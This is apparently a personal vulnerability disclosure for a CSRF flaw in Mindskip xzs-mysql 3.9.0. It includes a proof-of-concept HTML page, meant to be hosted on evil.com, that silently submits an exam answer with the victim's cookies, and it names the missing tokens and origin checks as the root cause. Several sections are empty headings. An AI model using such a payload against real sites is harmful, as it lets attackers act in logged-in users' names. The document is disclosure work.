Table of Contents

1. Description

Mindskip xzs-mysql 3.9.0 fails to implement CSRF protection, enabling attackers to coerce logged-in users into unknowingly sending state-modifying requests. This vulnerability exposes users to forced exam submissions and other unauthorized actions.

2. Affected Component

3. Type of Vulnerability

CWE-352: Cross-Site Request Forgery (CSRF)

4. Impact

5. Steps to Reproduce / PoC

  1. Ensure a user is logged into http://localhost:8000
  2. Host the following malicious page on http://evil.com: 
<!DOCTYPE html>
<html>
  <body>
    <script>
      fetch("http://localhost:8000/api/student/exampaper/answer/answerSubmit", {
        method: "POST",
        headers: {
          "Content-Type": "application/json"
        },
        credentials: "include",
        body: JSON.stringify({
          questionId: null,
          doTime: 7,
          answerItems: [
            {
              questionId: 1,
              content: "A",
              contentArray: [],
              completed: true,
              itemOrder: 1
            }
          ],
          id: 1
        })
      })
      .then(r => console.log("Request Sent", r))
      .catch(e => console.error("Error", e));
    </script>
  </body>
</html>

Once the victim visits this page while authenticated, the request is executed without their knowledge.

6. Root Cause

The backend lacks CSRF tokens and does not validate the Origin or Referer headers, allowing cross-site POSTs that change server-side state.

7. Mitigation Recommendations

8. References

© 2025 Cyd Tseng — ← Back to Writeups